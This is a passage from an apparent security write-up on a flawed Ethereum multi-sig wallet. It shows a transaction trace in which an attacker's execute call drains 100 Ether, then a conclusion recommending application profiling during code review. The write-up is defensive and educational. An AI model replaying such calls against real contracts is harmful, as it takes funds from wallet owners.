To:     Multi-Sig Wallet (0xde6a66562c299052b1cfd24abc1dc639d429e1d6)
Call:   execute("0xca35b7d915458ef540ade6068dfe2f44e8fa733c", "100000000000000000000", [])
Result: 0x0000000000000000000000000000000000000000000000000000000000000000
Events: SingleTransact[
  "0x14723a09acff6d2a60dcdf7aa4aff308fddc160c",
  "100000000000000000000",
  "0xca35b7d915458ef540ade6068dfe2f44e8fa733c",
  "0x",
  "0x0"
]

In this fictional example, the attacker has made off with 100 Ether (currently ~$30,000 USD).

Conclusion

Attacks involving transaction malleability, function reentrancy, and underflows all dwarf this kind of vulnerability in complexity. However, sometimes the worst vulnerabilities are hiding in plain sight rather than in underhanded or buggy code.

We have seen that applying a simple code review technique of profiling an application would have likely caught this vulnerability early on. Knowledge of the Solidity language and the EVM is required, but these can be picked up by consulting documentation, known pitfalls, and open source code bases. The underlying code review methodology stays largely the same.